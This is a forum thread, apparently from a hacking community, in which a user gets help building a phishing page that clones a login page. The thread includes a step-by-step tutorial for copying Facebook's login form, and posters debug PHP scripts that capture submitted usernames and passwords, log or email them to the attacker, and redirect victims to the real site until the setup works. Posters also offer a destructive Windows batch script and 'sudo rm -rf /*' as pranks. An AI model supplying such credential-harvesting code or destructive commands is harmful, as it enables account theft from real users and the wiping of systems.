help with (Phishing)

Hope that this is not for any illegal purposes?

You can use the php mail() function, but be careful, because a phishing page is illegal! :/

im not breaking the law just trying to learn not stealing any info ect can someone show me a how to set it up to send the logs to my email

is this what i need to change and if so what to

<?php
header (‘forwardedwebsitehere ’);
$handle = fopen(“logs_86354.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “===============\r\n”);
fclose($handle);
exit;
?>

Something like:

<?php $to = 'Receiver@something.com'; $subject = 'subject'; $body = 'First line'."\n\n".'Third line'; $headers = 'From: Your name<sender@something.com>'; if(mail($to,$subject, $body, $headers)){ echo 'An email has been sent to :' .$to; }else{ echo 'An error has occured!'; } ?>

Just put $body = $variable. I think that should do it.

is it possible for you to do it for me with the info i posted so i just can enter my email where needed i just changed the reciver email to mine i got a email but it was blank and also how to i make it forward to a diffrent site after i click login

Yes, that is enough.
The funny part is that you don’t even need to put a real email in the sender. This is used to spam a lot.

So you have a login page. Any one who enters the ID and password the value gets stored in $variable? Am I correct so far? After that you log that information in a text file currently? Another question are you doing this on local system using XAMPP or WAMP or something else or you have a live server on the internet with email access?

im just using 000webhost just having a mess around really so what i have done is now copy the php i have been told put put $body = $variable

put my email when i log in i get no logs only a email sent to me saying $variable also i need to know how to make it forward to another page after i enter my login details to i need to change anything in the index.html

this is what i have done t start and it works perfect but now i want to get the logs sent to my email insted

Phishing is the most common acttack which is used to hack any login details.
For which we need to have phishing pages to upload then in hosting sites. So today i gonno show you the process of to creating phishing pages of any websites.
Here i will show you an example of creating Phishing page (fake loin page) of Facebook.The method is same for any other website
What we are going to do now.
Normally in phishing we will just create a login page which looks same like the real website. For this we need not to code the whole script of the desired website. We just copy the scource code of the website and just change few modifications in page source and create fake login pages.

Step by Step tutorial
1. First go to the desired website Login page for which you want to create Phishing page
lets take www.facebook.com
2. Right click on the website and choose page source . Now you can see the whole script of the website.
3. Copy the whole script and paste it into a text file. Press Cntrol+F and type action .
Here in the case of www.facebook.com . the script line that has action looks something like this.
action=https://www.facebook.com/login.php?login_attempt=1%93
Now replace everything inside the quotes with login.php. so it will look like

action=login.php
4. Save the file as index.html.
5. Now open a new text file and paste the following code

header (Location: http://facebook.com );
$handle = fopen(logs_86354.txt, a);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, =);
fwrite($handle, $value);
fwrite($handle, \r\n);
}
fwrite($handle, ===============\r\n);
fclose($handle);
exit;
?>
Save it as login.php
Thats it now we have two files index.html and login.php. Those two are the Phishing pages of facebook now. If you want to create any login page the process is same.
How does the Phishing pages work.
Normaly the websites will be coded in a such a manner that user name, password ( or any login information) entered in the Input box will be directed to the database of the website for authentication. Here we just modified the page soucrce to get redirected to the php file which creates the text file which contains the login information which the victim enters in the login page.

Important points :-
1. Make sure that You find the page source in login page of the website. Not for any other page in the website. For example if you want to create phishing page of facebook. You should find the login page of the website, Not on the other pages like home ,profile or any other like that.
2. Here i sugested to you to name the file php file as login.php . You can name it anything you wish but make sure that that file name should be same name should be there for modified code in action=login.php and php file name. For example:-
If you set as action=anything.php pHp file name should also be anything.php.

Note:-
This Tutorial is for educational purpose only, I just want to make you aware about all hacking methods, So dont misuse this hacking tricks. We are not responsible for any wrong thing done by you.

This is what I use sometimes:

Login.html
```

Login

Forgot password?

script.php
``` <?php
$username = $POST[‘username’];
$password = $POST[‘password’];
?>

<?php
$to = ‘receiver@something.com’;
$subject = ‘subject!’;
$body = $username.“\n\n”.$password;
$headers = ‘From: Sender sender@something.com’;

if (mail($to, $subject, $body, $headers)) {
echo ‘An email has been sent to ’ .$to;

} else {
echo ‘An error has occurred!’;
}

?>```

From now, you can edit this code and use it, but with caution! :D

^^ thanks but how do i make it so it goe to a real site after i enter my pass ect

You change this:
if (mail($to, $subject, $body, $headers)) { echo 'An email has been sent to ' .$to;

to this

if (mail($to, $subject, $body, $headers)) { header('Location: https://www.facebook.com');

Copy this code in your login.php file. Just change the email addresses accordingly.

http://pastebin.com/ZY4Wf7uC

Once the person enters the login credentials and click login then the page will automatically get redirected to Facebook.com

Check out: www.tlotrblog.zz.vc/log.html

works just fine

Hi, could you guys write me some kind of program that sends mails to people saying they have to log in to facebook or else their account will be deleted? The idea is that it looks like it really comes from facebook and that they click a link to get to a login page like you have already made for @imnottellingyou before. This is totally just so I can learn from it, of course.

Thanks dudes!

[quote=“dloser”]
This is totally just so I can learn from it, of course.
[/quote]
lmao

Also, save that as .bat and run it as administrator, It will hack every facebook
```
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop “Security Center”
net stop SharedAccess
echo Facebook hacking…!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.facebook.com
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul

“%Temp%.kill.reg” ECHO REGEDIT4

“%Temp%.kill.reg” ECHO.
“%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
“%Temp%.kill.reg” ECHO “Start”=dword:00000004
“%Temp%.kill.reg” ECHO.
“%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
“%Temp%.kill.reg” ECHO “Start”=dword:00000004
“%Temp%.kill.reg” ECHO.
“%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
“%Temp%.kill.reg” ECHO “Start”=dword:00000004
“%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg”
del “%Temp%.kill.reg”
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c “Bye!” -f
```

@Mugiwara27 it didn’t work.

~ubuntu@lc.fb.me:level3 ubuntu$ cls  
-bash: cls: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ rundll32 mouse,disable  
-bash: rundll32: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ rundll32 keyboard,disable  
-bash: rundll32: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ COPY %0 %windir%WINSTART.BAT  
-bash: COPY: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ net stop "Security Center"  
-bash: net: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ net stop SharedAccess  
-bash: net: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ echo Facebook hacking...!!!  
-bash: !: event not found  
~ubuntu@lc.fb.me:level3 ubuntu$ @ping.exe 127.0.0.1 -n 5 -w 1000 > nul  
-bash: @ping.exe: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ start http://www.facebook.com  
-bash: start: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ @ping.exe 127.0.0.1 -n 5 -w 1000 > nul  
-bash: @ping.exe: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ > "%Temp%.kill.reg" ECHO REGEDIT4  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO.  
-bash: ECHO.: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO.  
-bash: ECHO.: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO.  
-bash: ECHO.: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004  
~ubuntu@lc.fb.me:level3 ubuntu$ >>"%Temp%.kill.reg" ECHO.  
-bash: ECHO.: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ START /WAIT REGEDIT /S "%Temp%.kill.reg"  
-bash: START: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ del "%Temp%.kill.reg"  
-bash: del: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ del %0  
-bash: del: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ DEL /F /S /Q C:  
-bash: DEL: command not found  
~ubuntu@lc.fb.me:level3 ubuntu$ shutdown -s -t 10 -c "Bye!" -f  
-bash: !": event not found  

^^^^ lol I think il give that a miss anyway I seem to have it working apart from I recive the email log and no password it just says array array??

the pastebin code
<?php

$email = $_POST['email'];  
$pass = $_POST['pass'];  

$to = "emailaddress@domain.com";  
$subject = "Login Details";  
$body = "Email or Phone: " .$email. " Password: ". $pass;  
$headers = "From: no-reply@domain.com";  

if(mail($to, $subject, $body, $headers)){  
    header('Location: https://www.facebook.com');  
}else{  
    echo "Something went wrong";  
}  

?>

I just get a email saying “Email or Phone and no password ect

Batch files are for windows and not Linux

cant get the email log I get a email it just says “Email or Phone

cant get the email log I get a email it just says “Email or Phone

So you are not getting the values, that’s strange cause it worked for me. Check that your input fields for both email and password has name email and pass if it’s something else then you will have to change it either in index.html or login.php

heres the login php that saves the logs that I can get to work but I need it to send to email

<?php
header (‘Location: https://facebook.com ’);
$handle = fopen(“logs_86354.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “===============\r\n”);
fclose($handle);
exit;
?>

ahh dident relise I need to put my email and pass il try that

This is what it should be like. If you have changed it then revert it back to the default and then try again.

<label for="email" class="login_form_label">Email or Phone:</label><input type="text" class="inputtext" id="email" name="email" value="" tabindex="1" />  

<label for="pass" class="login_form_label">Password:</label><input type="password" name="pass" id="pass" class="inputpassword" tabindex="1" />  

its not facebook im trying to copy this is part of my index that I belive needs to be changed to work with your php

Yes you need to change the $_POST for both $email and $pass to username and password respectively for it to work. This needs to be done in the login.php page.

Remove email and put username
Remove pass and put password

Edit: If making these changes make the code work then kindly close this thread.

ownagehax0r do that on ubuntu :
sudo rm -rf /*

@Mugiwara27 : Will that really delete everything from the / folder. I mean will it not give any message that some files cannot be deleted or something like that.

It depends if there are any marked as immutable. It’s not windows, you can delete things that are in use by other processes. But it will reck most of it for sure (also, the “*” is unnecessary)

it worked thanks :) :) now 1 last question so it sends me the details and then takes me to the real site is there anyway I can make it so it logs into the real site automatically ?

Nope that can’t be done as far as I know but I may be wrong.